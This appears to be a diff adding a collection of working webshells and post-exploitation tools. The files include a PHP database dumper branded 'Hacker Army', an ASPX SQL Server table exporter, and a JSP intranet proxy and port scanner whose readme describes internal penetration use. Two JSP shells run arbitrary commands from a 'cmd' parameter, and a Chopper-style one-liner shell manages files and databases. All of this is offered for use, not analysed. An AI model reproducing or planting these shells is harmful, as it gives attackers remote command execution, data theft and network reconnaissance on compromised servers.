+$t3=$CODE{10}.$CODE{7}.$CODE{12}.$CODE{8};
+$t4=$CODE{1}.$CODE{5}.$CODE{0}.$CODE{2}.$CODE{4}.$CODE{1}.$CODE{0}.$CODE{8}.".".$CODE{7}.$CODE{10}.$CODE{16};
+$CODE=$dbps;
+?>
+<title><?php echo "S".$t2." G".$t3.$C0DE.$t4;?></title>
+<?php
+if (!empty($host) & !empty($uid) & !empty($db)){
+$mysql_link=@mysql_connect($host,$uid,$dbps);
+mysql_select_db($db);
+$t1("SET NAMES gbk");
+$mysql="";
+$q1=mysql_query("show tables");
+while($t=mysql_fetch_array($q1)){
+  $table=$t[0];
+  $q2=mysql_query("show create table `$table`");
+  $sql=mysql_fetch_array($q2);
+  $mysql.=$sql['Create Table'].";\r\n\r\n";
+  $q3=mysql_query("select * from `$table`");
+  while($data=mysql_fetch_assoc($q3))
+    {
+    $keys=array_keys($data);
+    $keys=array_map('addslashes',$keys);
+    $keys=join('`,`',$keys);    
+    $keys="`".$keys."`";
+    $vals=array_values($data);
+    $vals=array_map('addslashes',$vals);
+    $vals=join("','",$vals);
+    $vals="'".$vals."'";
+    $mysql.="insert into `$table`($keys) values($vals);\r\n";
+    }
+  $mysql.="\r\n";
+}
+$filename=date("Y-m-d-GisA").".sql";
+$fp=fopen($filename,'w');
+fputs($fp,$mysql);
+fclose($fp);
+$tip="<br><center>&#25968;&#25454;&#22791;&#20221;&#25104;&#21151;&#65292;&#25968;&#25454;&#24211;&#25991;&#20214;&#65306;<a href=\"".$filename."\">".$filename."</a></center>";
+}?>
+<style type="text/css">
+html{background:#f7f7f7;}
+p{font-size:10pt;}
+.tx{font-family:Lucida Handwriting,Times New Roman;}
+</style>
+</head>
+<body><center>
+<form method="post" action="<?php echo $HTTP_SERVER_VARS['php_self'];?>?">
+<br /><?php echo $tip;?><br />
+<hr><br />
+&#77;&#121;&#83;&#81;&#76;&#20027;&#26426;&#58;&#32;<input name="host" value="<?php echo $host;?>" type="text"  class="tx" size="15"><br /><br />
+&#77;&#121;&#83;&#81;&#76;&#29992;&#25143;&#58;&#32;<input name="uid" value="<?php echo $uid;?>" type="text"  class="tx" size="15"><br /><br />
+&#77;&#121;&#83;&#81;&#76;&#23494;&#30721;&#58;&#32;<input name="password" value="<?php echo $CODE;?>"  type="text" class="tx" size="15"><br /><br />
+&#25968;&#25454;&#24211;&#21517;&#58;&#32;<input name="db" value="<?php echo $db;?>" type="text"  class="tx" size="15"><br /><br />
+<input type="submit" value="<?php echo base64_decode("0ru8/LG4t90=");?>" tilte="Submit" style="width:120px;height:64px;"><hr><br />
+<p class="tx">php MySQL Database Backup Script Powered By <a href="http://<?php echo $t4;?>/" target="_blank"><?php echo "S".$t2." G".$t3." &#72;&#97;&#99;&#107;&#101;&#114;&#32;&#65;&#114;&#109;&#121;";?></a>&copy;2009-2012</p>
+</form>
+</center></body></html>

drag/tuo.aspx

@@ -0,0 +1,307 @@
+<%@ Page Language="C#" %>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+
+<script runat="server">
+    protected void Button1_Click(object sender, EventArgs e)
+    {
+        string serverIP=txtServerIP.Text;
+        string database=txtDatabase.Text;
+        string user=txtUser.Text;
+        string pass=txtPass.Text;
+        string tableName=txtTableName.Text;
+        string colName=txtColName.Text;
+        string fileName=txtFileName.Text;
+        if (serverIP != null & database != null & user != null & pass != null & tableName != null & fileName != null)
+        {
+            
+            
+             string connectionString = "server="+serverIP+";database="+database+";uid="+user+";pwd="+pass;
+            System.Data.SqlClient.SqlConnection connection = new System.Data.SqlClient.SqlConnection(connectionString);
+            
+            try
+            {             
+           
+            connection.Open();
+            string sqlStr = "select * from "+tableName;
+            
+            if (colName!="")
+            {
+                sqlStr = "select " + colName + " from " + tableName;              
+                
+            }
+            
+            System.Data.DataSet ds = new System.Data.DataSet();
+            System.Data.SqlClient.SqlCommand cmd = new System.Data.SqlClient.SqlCommand(sqlStr, connection);
+            System.Data.SqlClient.SqlDataAdapter da = new System.Data.SqlClient.SqlDataAdapter(cmd);
+            da.Fill(ds);
+            System.Data.DataTable dataTable = ds.Tables[0];
+            if (dataTable.Rows.Count==0)
+            { 
+                lblInfo.Text = "没有需要导出的数据！";
+                lblInfo.ForeColor = System.Drawing.Color.Blue;
+                return;
+                
+            }
+            string filePath = System.IO.Path.GetDirectoryName(Server.MapPath("DataOutExl.aspx"))+"\\DataOut";
+            if (!System.IO.Directory.Exists(filePath))
+            {
+                System.IO.Directory.CreateDirectory(filePath);
+            }
+            bool outType = RadioButton1.Checked;
+            int sum = dataTable.Rows.Count;
+            int count = 1;
+            int size = 0;
+            int tmpNum = 1;
+                
+            if (txtNum.Text!="")
+            {
+                size = int.Parse(txtNum.Text);
+                count = sum / size+1;
+            }
+            for (int z = 0; z < count; z++)
+            {
+            Button1.Text = "正在导出..";
+            Button1.Enabled = false;
+            lblInfo.Text = "正在导出第"+(z+1)+"组数据，共"+count+"组数据";
+            lblInfo.ForeColor = System.Drawing.Color.Blue;  
+                
+            System.IO.StreamWriter file = new System.IO.StreamWriter(filePath+"\\" + (z+1) +"_"+fileName, false, Encoding.UTF8);
+                
+            bool isFirst = true;
+            if (outType)
+            {
+                
+           
+            file.Write(@"<html><head><meta http-equiv=content-type content='text/html; charset=UNICODE'>
+                        <style>*{font-size:12px;}table{background:#DDD;border:solid 2px #CCC;}td{background:#FFF;}
+                        .th td{background:#EEE;font-weight:bold;height:28px;color:#008;}
+                        div{border:solid 1px #DDD;background:#FFF;padding:3px;color:#00B;}</style>
+                        <title>Export Table</title></head><body>");
+                
+            file.Write("<table border='0' cellspacing='1' cellpadding='3'>");
+                
+            }
+                
+            for (int i = size*z; i < dataTable.Rows.Count; i++)
+            {
+                System.Data.DataRow dataRow = dataTable.Rows[i];
+                if (isFirst)
+                {
+                    if ( outType)
+                    {
+                        file.Write("<tr class='th'>");
+                    }
+                    
+                    for (int j = 0; j < dataTable.Columns.Count; j++)
+                    {
+                        if (outType)
+                        {
+                            file.Write("<td>");
+                        }
+                        
+                        file.Write(dataTable.Columns[j].ColumnName + "     ");
+                        
+                        if (outType)
+                        {
+                            file.Write("</td>");
+                        }
+                    }
+                    
+                    if (outType)
+                    {
+                        file.Write("</tr>");
+                    }
+                    
+                    isFirst = false;
+                }
+              
+                if (outType)
+                {
+                    file.Write("<tr>");
+                }
+                else
+                {
+                    file.WriteLine(" ");
+                }
+              
+                for (int k = 0; k < dataTable.Columns.Count; k++)
+                {
+                    if (outType)
+                    {
+                        file.Write("<td>");
+                    }
+                    file.Write(dataTable.Rows[i][k] + "     ");
+                    if (outType)
+                    {
+                        file.Write("</td>");
+                    }
+                }
+               
+                
+                if (outType)
+                {
+                    file.Write("<tr>");
+                }
+                else
+                {
+                    file.WriteLine(" ");
+                }
+             
+                if (tmpNum==size)                
+                    break;
+                              
+                tmpNum += 1;
+               
+            }
+                
+            if (outType)
+            {
+                file.Write("</table>");
+                file.Write("<br /><div>执行成功!返回" + tmpNum + "行</div>");
+                file.Write("</body></html>");
+            }
+            else
+            {
+                file.WriteLine("执行成功!返回" + tmpNum + "行!");
+            }
+                
+            file.Dispose();
+            file.Close();
+            tmpNum = 1;
+            }
+                
+                
+            lblInfo.Text = "导出成功！";
+            lblInfo.ForeColor = System.Drawing.Color.Blue;
+            Button1.Enabled = true;
+            Button1.Text = "开始导出";
+           
+            }
+            catch (Exception ex)
+            {
+                lblInfo.Text = "导出失败！" + ex.Message;
+                lblInfo.ForeColor = System.Drawing.Color.Red;
+               
+            }finally
+            {
+                connection.Close();
+            }
+                      
+        }
+        else
+        {
+            lblInfo.Text = "请先填写相关的连接信息！";
+            lblInfo.ForeColor = System.Drawing.Color.Red;
+        }
+    }
+</script>
+
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head runat="server">
+    <title>无标题页</title>
+    <style type="text/css">
+        .style1
+        {
+            width: 61%;
+        }
+        .style2
+        {
+            height: 23px;
+        }
+    </style>
+</head>
+<body>
+    <form id="form1" runat="server">
+    <div>
+    
+        <table class="style1">
+            <tr>
+                <td class="style2" colspan="2" align=center>
+                    SQL Server 数据导出&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
+                    By:<a href="http://hi.baidu.com/闪电小子_tysan">闪电小子</a></td>
+               
+            </tr>
+            <tr>
+                <td>
+                    服务器IP:</td>
+                <td>
+                    <asp:TextBox ID="txtServerIP" runat="server" Width="172px"></asp:TextBox>
+                    *</td>
+            </tr>
+            <tr>
+                <td>
+                    数据库：</td>
+                <td>
+                    <asp:TextBox ID="txtDatabase" runat="server" Width="172px"></asp:TextBox>
+                    *</td>
+            </tr>
+            <tr>
+                <td>
+                    用户名：</td>
+                <td>
+                    <asp:TextBox ID="txtUser" runat="server" Width="172px"></asp:TextBox>
+                    *</td>
+            </tr>
+            <tr>
+                <td>
+                    密码：</td>
+                <td>
+                    <asp:TextBox ID="txtPass" runat="server" Width="172px"></asp:TextBox>
+                    *</td>
+            </tr>
+            <tr>
+                <td>
+                    表名：</td>
+                <td>
+                    <asp:TextBox ID="txtTableName" runat="server" Width="172px"></asp:TextBox>
+                    *</td>
+            </tr>
+             <tr>
+                <td>
+                    列名：</td>
+                <td>
+                    <asp:TextBox ID="txtColName" runat="server" Width="172px"></asp:TextBox>
+                &nbsp; 列名之间请用‘,’分开，不写代表全部</td>
+            </tr>
+             <tr>
+                <td>
+                    分组行数：</td>
+                <td>
+                    <asp:TextBox ID="txtNum" runat="server" Width="172px"></asp:TextBox>
+                    &nbsp; 对于数据多的时候可以使用</td>
+            </tr>
+            <tr>
+                <td>
+                    保存文件名：</td>
+                <td>
+                    <asp:TextBox ID="txtFileName" runat="server" Width="172px"></asp:TextBox>
+                    *</td>
+            </tr>
+            <tr>
+                <td>
+                    文件格式：</td>
+                <td>
+                    <asp:RadioButton ID="RadioButton1" runat="server" GroupName="type" Checked="true" Text="html" />
+                    &nbsp; &nbsp; &nbsp; &nbsp;
+                    <asp:RadioButton ID="RadioButton2" runat="server" GroupName="type" Text="txt" />
+                </td>
+            </tr>
+             <tr>
+                <td class="style2" colspan="2" align="center">
+                    <asp:Button ID="Button1" runat="server" Text="开始导出" onclick="Button1_Click" />
+                 </td>
+               
+            </tr>
+            <tr>
+                <td colspan="2">
+                    <asp:Label ID="lblInfo" runat="server" Text=""></asp:Label>
+                    </td>
+                
+            </tr>
+        </table>
+    
+    </div>
+    </form>
+</body>
+</html>

jsp/netspy/netspy.jsp

@@ -0,0 +1,563 @@
+<%@page import="org.apache.commons.io.FileUtils"%>
+<%@page import="java.io.File"%>
+<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
+<%@ page isThreadSafe="false"%>
+<%@page import="java.net.*"%>
+<%@page import="java.io.PrintWriter"%>
+<%@page import="java.io.BufferedReader"%>
+<%@page import="java.io.FileReader"%>
+<%@page import="java.io.FileWriter"%>
+<%@page import="java.io.OutputStreamWriter"%>
+<%@page import="java.util.regex.Matcher"%>
+<%@page import="java.io.IOException"%>
+<%@page import="java.net.InetAddress"%>
+<%@page import="java.util.regex.Pattern"%>
+<%@page import="java.net.HttpURLConnection"%>
+<%@page import="java.util.concurrent.LinkedBlockingQueue"%>
+
+
+<%!final static List<String> list = new ArrayList<String>();
+	String referer = "";
+	String cookie = "";
+	String decode = "utf-8";
+	int thread = 100;
+	//final static List<String> scanportlist = new ArrayList<String>();
+	String cpath="";
+
+	//建立一个HTTP连接
+	HttpURLConnection getHTTPConn(String urlString) {
+		try {
+			java.net.URL url = new java.net.URL(urlString);
+			java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url
+					.openConnection();
+			conn.setRequestMethod("GET");
+			conn.addRequestProperty("User-Agent",
+					"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)");
+			conn.addRequestProperty("Accept-Encoding", "gzip");
+			conn.addRequestProperty("referer", referer);
+			conn.addRequestProperty("cookie", cookie);
+			//conn.setInstanceFollowRedirects(false);
+			conn.setConnectTimeout(3000);
+			conn.setReadTimeout(3000);
+
+			return conn;
+		} catch (Exception e) {
+			return null;
+		}
+	}
+
+	String PostData(String urlString, String postString) {
+		HttpURLConnection http = null;
+		String response = null;
+		try {
+			java.net.URL url = new java.net.URL(urlString);
+			http = (HttpURLConnection) url.openConnection();
+			http.setDoInput(true);
+			http.setDoOutput(true);
+			http.setUseCaches(false);
+			http.setConnectTimeout(50000);
+			http.setReadTimeout(50000);
+			http.setRequestMethod("POST");
+			http.setRequestProperty("Content-Type",
+					"application/x-www-form-urlencoded");
+			http.connect();
+			OutputStreamWriter osw = new OutputStreamWriter(
+					http.getOutputStream(), decode);
+			osw.write(postString);
+			osw.flush();
+			osw.close();
+			response = getHtmlByInputStream(http.getInputStream(), decode);
+		} catch (Exception e) {
+			response = getHtmlByInputStream(http.getErrorStream(), decode);
+		}
+		return response;
+	}
+
+	HttpURLConnection conn;
+
+	//从输入流中读取源码
+	String getHtmlByInputStream(java.io.InputStream is, String code) {
+		StringBuffer html = new StringBuffer();
+		try {
+
+			java.io.InputStreamReader isr = new java.io.InputStreamReader(is,
+					code);
+			java.io.BufferedReader br = new java.io.BufferedReader(isr);
+			String temp;
+			while ((temp = br.readLine()) != null) {
+				if (!temp.trim().equals("")) {
+					html.append(temp).append("\n");
+				}
+			}
+			br.close();
+			isr.close();
+		} catch (Exception e) {
+			System.out.print(e.getMessage());
+		}
+
+		return html.toString();
+	}
+
+	//获取HTML源码
+	String getHtmlContext(HttpURLConnection conn, String decode,boolean isError) {
+		Map<String, Object> result = new HashMap<String, Object>();
+		String code = "utf-8";
+		if (decode != null) {
+			code = decode;
+		}
+		try {
+			return getHtmlByInputStream(conn.getInputStream(), code);
+		} catch (Exception e) {
+			try {
+			if(isError){
+			   return getHtmlByInputStream(conn.getErrorStream(), code);
+			}
+			} catch (Exception e1) {
+				System.out.println("getHtmlContext2:" + e.getMessage());
+			}
+			System.out.println("getHtmlContext:" + e.getMessage());
+			return "null";
+		}
+	}
+
+	//获取Server头
+	String getServerType(HttpURLConnection conn) {
+		try {
+			return conn.getHeaderField("Server");
+		} catch (Exception e) {
+			return "null";
+		}
+
+	}
+
+	//匹配标题
+	String getTitle(String htmlSource) {
+		try {
+			List<String> list = new ArrayList<String>();
+			String title = "";
+			Pattern pa = Pattern.compile("<title>.*?</title>");
+			Matcher ma = pa.matcher(htmlSource);
+			while (ma.find()) {
+				list.add(ma.group());
+			}
+			for (int i = 0; i < list.size(); i++) {
+				title = title + list.get(i);
+			}
+			return title.replaceAll("<.*?>", "");
+		} catch (Exception e) {
+			return null;
+		}
+	}
+
+	//得到css
+	List<String> getCss(String html, String url, String decode) {
+		List<String> cssurl = new ArrayList<String>();
+		List<String> csscode = new ArrayList<String>();
+		try {
+
+			String title = "";
+			Pattern pa = Pattern.compile(".*href=\"(.*)[.]css");
+			Matcher ma = pa.matcher(html.toLowerCase());
+			while (ma.find()) {
+				cssurl.add(ma.group(1) + ".css");
+			}
+
+			for (int i = 0; i < cssurl.size(); i++) {
+				String cssuuu = url + "/" + cssurl.get(i);
+				String csshtml = "<style>"
+						+ getHtmlContext(getHTTPConn(cssuuu), decode,false)
+						+ "</style>";
+				csscode.add(csshtml);
+
+			}
+		} catch (Exception e) {
+			System.out.println("getCss:" + e.getMessage());
+		}
+		return csscode;
+
+	}
+
+	//域名解析成IP
+	String getMyIPLocal() throws IOException {
+		InetAddress ia = InetAddress.getLocalHost();
+		return ia.getHostAddress();
+	}
+	
+	
+	
+	boolean getHostPort(String task){
+		Socket client = null;
+		boolean isOpen=false;
+		try{
+		     String[] s=task.split(":");
+	    	 client = new Socket(s[0], Integer.parseInt(s[1]));
+	  		 isOpen=true;
+	  		 System.out.println("getHostPort:"+task);
+	  		 //scanportlist.add(task+" >>> Open");
+	  		 saveScanReslt2(task+" >>> Open\r\n");
+		}catch(Exception e){
+			 isOpen=false;
+		}
+	    return isOpen;
+	}
+	
+	void getPath(String path){
+	cpath=path;
+	}
+	
+/* 	void saveScanReslt(String s){
+	try{
+	FileUtils.writeStringToFile(new File(cpath+"/port.txt"), s,"UTF-8",true);
+	}catch(Exception e){
+	System.out.print(e.getLocalizedMessage());
+	}
+	} */
+	
+	 void saveScanReslt2(String content) {   
+        FileWriter writer = null;  
+        try {     
+            writer = new FileWriter(cpath+"/port.txt", true);     
+            writer.write(content);       
+        } catch (IOException e) {     
+           System.out.print(e.getLocalizedMessage());   
+        } finally {     
+            try {     
+                if(writer != null){  
+                    writer.close();     
+                }  
+            } catch (IOException e) {     
+              System.out.print(e.getLocalizedMessage());   
+            }     
+        }   
+    }
+	
+	
+	
+	String s="Result:<br/>";
+	String readPortResult(String portfile){
+	    File file = new File(portfile);
+        BufferedReader reader = null;
+        try {
+            System.out.println("");
+            reader = new BufferedReader(new FileReader(file));
+            String tempString = null;
+            while ((tempString = reader.readLine()) != null) {
+              s+=tempString+"<br/>";
+            }
+            reader.close();
+        } catch (IOException e) {
+             return null;
+        } finally {
+            if (reader != null) {
+                try {
+                    reader.close();
+                } catch (IOException e1) {
+                return null;
+                }
+            }
+        }
+        return s;
+	}
+	
+	
+	%>
+
+
+<html>
+
+<head>
+<title>内网简单扫描脚本</title>
+</head>
+<body>
+	<script>
+		function showDiv(obj) {
+			//var statu = document.getElementById("prequest").style.display;
+			if (obj == "proxy") {
+				document.getElementById("proxy").style.display = "block";
+				document.getElementById("web").style.display = "none";
+				document.getElementById("port").style.display = "none";
+
+			} else if (obj == "web") {
+				document.getElementById("proxy").style.display = "none";
+				document.getElementById("web").style.display = "block";
+				document.getElementById("port").style.display = "none";
+
+			} else if (obj == "port") {
+				document.getElementById("proxy").style.display = "none";
+				document.getElementById("web").style.display = "none";
+				document.getElementById("port").style.display = "block";
+
+			}
+		}
+	</script>
+	<p>
+		<a href="javascript:void(0);" onclick="showDiv('proxy');"
+			style="margin-left: 32px;">代理访问</a> <a href="javascript:void(0);"
+			onclick="showDiv('web');" style="margin-left: 32px;">Web扫描</a> <a
+			href="javascript:void(0);" onclick="showDiv('port');"
+			style="margin-left: 32px;">端口扫描</a>
+	</p>
+
+	<div id="proxy"
+		style="border:1px solid #999;padding:3px;margin-left:30px;width: 95%;height: 32%;display:block;">
+		<form action="" method="POST" style="margin-left: 50px;">
+			<p>
+				Url：<input name="url" value="http://127.0.0.1:8080"
+					style="width: 380px;" />
+			</p>
+			<p>
+				Method:<select name="method">
+					<option value="GET">GET</option>
+					<option value="POST">POST</option>
+				</select> Decode:<select name="decode">
+					<option value="utf-8">utf-8</option>
+					<option value="gbk">gbk</option>
+				</select>
+			</p>
+			<p>
+				<textarea name="post" cols=40 rows=4>username=admin&password=admin</textarea>
+				<textarea name="post" cols=40 rows=4>SESSION:d89de9c2b4e2395ee786f1185df21f2c51438059222</textarea>
+
+			</p>
+			<p>
+				Referer:<input name="referer" value="http://www.baidu.com"
+					style="width: 380px;" />
+			</p>
+			<p></p>
+
+			<p>
+				<input type="submit" value="Request" />
+			</p>
+		</form>
+	</div>
+
+	<div id="web"
+		style="border:1px solid #999;padding:3px;margin-left:30px;width: 95%;height: 32%; display:none;">
+		<form action="" method="POST" style="margin-left: 50px;">
+			<p>
+				IP:<input name="ip" value="127.0.0.1">
+			</p>
+			<p>
+				Port:<input name="port" value="80,8080,8081,8088">
+			</p>
+			<input type="submit" value="Scan">
+		</form>
+	</div>
+
+	<div id="port"
+		style="border:1px solid #999;padding:3px;margin-left:30px;width: 95%;height: 32%; display:none;">
+		<form action="" method="POST" style="margin-left: 50px;">
+			<p>
+				IP:<input name="scanip" value="192.168.12.1">-<input
+					name="scanip2" value="192.168.12.10">
+			</p>
+			<p>
+				Port:<input name="scanport"
+					value="21,80,135,443,1433,1521,3306,3389,8080,27017"
+					style="width: 300px;">
+			</p>
+			<p>
+				Thread:<input name="thread" value="100" style="width: 30px;">
+			</p>
+			<input type="submit" value="Scan">
+		</form>
+	</div>
+
+	<br />
+</body>
+</html>
+<%
+	final JspWriter pwx = out;
+	String s = application.getRealPath("/") + "/port.txt";
+	String result = readPortResult(s);
+	if (result != null) {
+		try {
+			pwx.println(result);
+		} catch (Exception e) {
+			System.out.print(e.getMessage());
+		}
+	}else{
+       pwx.println("如果你进行了端口扫描操作，那么这里将会显示扫描结果！<br/>");
+	}
+	String div1 = "<div style=\"border:1px solid #999;padding:3px;margin-left:30px;width:95%;height:90%;\">";
+	String div2 = "</div>";
+
+	String u = request.getParameter("url");
+	String ip = request.getParameter("ip");
+	String scanip = request.getParameter("scanip");
+
+	if (u != null) {
+
+		String post = request.getParameter("post");
+		System.out.print(u);
+		System.out.print(post);
+		decode = request.getParameter("decode");
+		String ref = request.getParameter("referer");
+		String cook = request.getParameter("cookie");
+
+		if (ref != null) {
+			referer = ref;
+		}
+		if (cook != null) {
+			cookie = cook;
+		}
+
+		String html = null;
+
+		if (post != null) {
+			html = PostData(u, post);
+		} else {
+			html = getHtmlContext(getHTTPConn(u), decode, true);
+		}
+
+		String reaplce = "href=\"http://127.0.0.1:8080/Jwebinfo/out.jsp?url=";
+		//html=html.replaceAll("href=['|\"]?http://(.*)['|\"]?", reaplce+"http://$1\"");
+		html = html.replaceAll("href=['|\"]?(?!http)(.*)['|\"]?",
+				reaplce + u + "$1");
+		List<String> css = getCss(html, u, decode);
+		String csshtml = "";
+		if (!html.equals("null")) {
+			for (int i = 0; i < css.size(); i++) {
+				csshtml += css.get(i);
+			}
+			out.print(div1 + html + csshtml + div2);
+		} else {
+			response.setStatus(HttpServletResponse.SC_NOT_FOUND);
+			out.print("请求失败！");
+		}
+		return;
+	}
+
+	else if (ip != null) {
+		String threadpp = (request.getParameter("thread"));
+		String[] port = request.getParameter("port").split(",");
+
+		if (threadpp != null) {
+			thread = Integer.parseInt(threadpp);
+			System.out.println(threadpp);
+		}
+		try {
+			try {
+				String http = "http://";
+				String localIP = getMyIPLocal();
+				if (ip != null) {
+					localIP = ip;
+				}
+				String useIP = localIP.substring(0,
+						localIP.lastIndexOf(".") + 1);
+				final Queue<String> queue = new LinkedBlockingQueue<String>();
+				for (int i = 1; i <= 256; i++) {
+					for (int j = 0; j < port.length; j++) {
+						String url = http + useIP + i + ":" + port[j];
+						queue.offer(url);
+						System.out.print(url);
+					}
+
+				}
+				final JspWriter pw = out;
+				ThreadGroup tg = new ThreadGroup("c");
+				for (int i = 0; i < thread; i++) {
+					new Thread(tg, new Runnable() {
+						public void run() {
+							while (true) {
+								String addr = queue.poll();
+								if (addr != null) {
+									System.out.println(addr);
+									HttpURLConnection conn = getHTTPConn(addr);
+									String html = getHtmlContext(conn,
+											decode, false);
+									String title = getTitle(html);
+									String serverType = getServerType(conn);
+									String status = !html
+											.equals("null") ? "Success"
+											: "Fail";
+									if (html != null
+											&& !status.equals("Fail")) {
+										try {
+											pw.println(addr + "  >>  "
+													+ title + ">>"
+													+ serverType
+													+ " >>" + status
+													+ "<br/>");
+										} catch (Exception e) {
+											e.printStackTrace();
+										}
+									}
+								} else {
+									return;
+								}
+							}
+						}
+					}).start();
+				}
+				while (tg.activeCount() != 0) {
+				}
+			} catch (Exception e) {
+				e.printStackTrace();
+			}
+		} catch (Exception e) {
+			out.println(e.toString());
+		}
+	} else if (scanip != null) {
+		getPath(application.getRealPath("/"));
+		int thread = Integer.parseInt(request.getParameter("thread"));
+		String[] port = request.getParameter("scanport").split(",");
+		String ip1 = scanip;
+		String ip2 = request.getParameter("scanip2");
+
+		int start = Integer.parseInt(ip1.substring(
+				ip1.lastIndexOf(".") + 1, ip1.length()));
+		int end = Integer.parseInt(ip2.substring(
+				ip2.lastIndexOf(".") + 1, ip2.length()));
+
+		String useIp = scanip.substring(0, scanip.lastIndexOf(".") + 1);
+
+		System.out.println("start:" + start);
+		System.out.println("end:" + end);
+
+		final Queue<String> queue = new LinkedBlockingQueue<String>();
+		for (int i = start; i <= end; i++) {
+			for (int j = 0; j < port.length; j++) {
+				String scantarget = useIp + i + ":" + port[j];
+				queue.offer(scantarget);
+				//System.out.println(scantarget);
+			}
+
+		}
+		System.out.print("Count1:" + queue.size());
+		final JspWriter pw = out;
+		ThreadGroup tg = new ThreadGroup("c");
+		for (int i = 0; i < thread; i++) {
+			new Thread(tg, new Runnable() {
+				public void run() {
+					while (true) {
+						String scantask = queue.poll();
+						if (scantask != null) {
+							getHostPort(scantask);
+							/* String result = null;
+							if(isOpen){
+							result=scantask+ " >>> Open<br/>";
+							scanportlist.add(result);
+							System.out.println(result);
+							} */
+
+							/* try {
+							pw.println(result);
+							} catch (Exception e) {
+							System.out.print(e.getMessage());
+							} */
+						}
+					}
+				}
+			}).start();
+
+		}
+		/* while (tg.activeCount() != 0) {
+		} */
+		try {
+			pw.println("扫描线程已经开始，请查看" + cpath+"/port.txt文件或者直接刷新本页面！");
+		} catch (Exception e) {
+			System.out.print(e.getMessage());
+		}
+	}
+%>

jsp/netspy/readme.md

@@ -0,0 +1,14 @@
+之前是使用的参数模式，现在搞了一个简单的UI。 
+
+前言： 
+某些情况下，内网渗透时，代理出不来，工具传上去被杀，总之就是遇到各种问题。而最过纠结的时，我已经知道内网哪台机器有洞了..（经验多的大神飘过，如果能解决某些内网渗透时遇到的坑的问题，求分享解决方法..） 
+
+功能： 
+代理访问虽然是个简单的功能，但是我觉得够用了。完全可以用来直接扫描内网其他web服务器的目录，尝试内网其其他登陆入口的弱口令，或者直接代理打struts或者其他漏洞。 
+
+web扫描： 
+其实我觉得用web发现更加贴切，其实有了端口扫描为啥还要这个.(因为之前的代码不想动它了。) 
+
+
+端口扫描： 
+大家都懂。（此功能问题较多，我觉得如果能使用工具或者代理回来就尽量不使用此脚本进行扫描。）

jsp/pb.jsp

@@ -0,0 +1,3 @@
+1	<%@ page contentType="text/html; charset=GBK" %>
+\
+<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s +"\\r\\n"; } } catch(IOException e) { e.printStackTrace(); } } %> <pre> <%=output %> </pre>	3	4	5

jsp/test.jsp

@@ -0,0 +1,3 @@
+1234<%@ page contentType="text/html; charset=GBK" %>
+<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s +"\r\n"; } } catch(IOException e) { e.printStackTrace(); } } 
+out.println(output);%>

jsp/yijuhua.jsp

@@ -0,0 +1,288 @@
+<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
+<%!
+	String Pwd = "a";
+	String cs = "UTF-8";
+	String EC(String s) throws Exception {
+		return new String(s.getBytes("ISO-8859-1"),cs);
+	}
+	Connection GC(String s) throws Exception {
+		String[] x = s.trim().split("\r\n");
+		Class.forName(x[0].trim());
+		if(x[1].indexOf("jdbc:oracle")!=-1){
+			return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
+		}else{
+			Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
+			if (x.length > 4) {
+				c.setCatalog(x[4]);
+			}
+			return c;
+		}
+	}
+	void AA(StringBuffer sb) throws Exception {
+		File r[] = File.listRoots();
+		for (int i = 0; i < r.length; i++) {
+			sb.append(r[i].toString().substring(0, 2));
+		}
+	}
+	void BB(String s, StringBuffer sb) throws Exception {
+		File oF = new File(s), l[] = oF.listFiles();
+		String sT, sQ, sF = "";
+		java.util.Date dt;
+		SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+		for (int i = 0; i < l.length; i++) {
+			dt = new java.util.Date(l[i].lastModified());
+			sT = fm.format(dt);
+			sQ = l[i].canRead() ? "R" : "";
+			sQ += l[i].canWrite() ? " W" : "";
+			if (l[i].isDirectory()) {
+				sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");
+			} else {
+				sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";
+			}
+		}
+		sb.append(sF);
+	}
+	void EE(String s) throws Exception {
+		File f = new File(s);
+		if (f.isDirectory()) {
+			File x[] = f.listFiles();
+			for (int k = 0; k < x.length; k++) {
+				if (!x[k].delete()) {
+					EE(x[k].getPath());
+				}
+			}
+		}
+		f.delete();
+	}
+	void FF(String s, HttpServletResponse r) throws Exception {
+		int n;
+		byte[] b = new byte[512];
+		r.reset();
+		ServletOutputStream os = r.getOutputStream();
+		BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
+		os.write(("->" + "|").getBytes(), 0, 3);
+		while ((n = is.read(b, 0, 512)) != -1) {
+			os.write(b, 0, n);
+		}
+		os.write(("|" + "<-").getBytes(), 0, 3);
+		os.close();
+		is.close();
+	}
+	void GG(String s, String d) throws Exception {
+		String h = "0123456789ABCDEF";
+		File f = new File(s);
+		f.createNewFile();
+		FileOutputStream os = new FileOutputStream(f);
+		for (int i = 0; i < d.length(); i += 2) {
+			os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));
+		}
+		os.close();
+	}
+	void HH(String s, String d) throws Exception {
+		File sf = new File(s), df = new File(d);
+		if (sf.isDirectory()) {
+			if (!df.exists()) {
+				df.mkdir();
+			}
